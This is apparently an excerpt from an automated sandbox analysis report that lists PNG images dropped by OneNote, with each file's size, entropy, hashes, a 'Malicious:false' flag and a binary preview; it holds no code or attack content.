                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
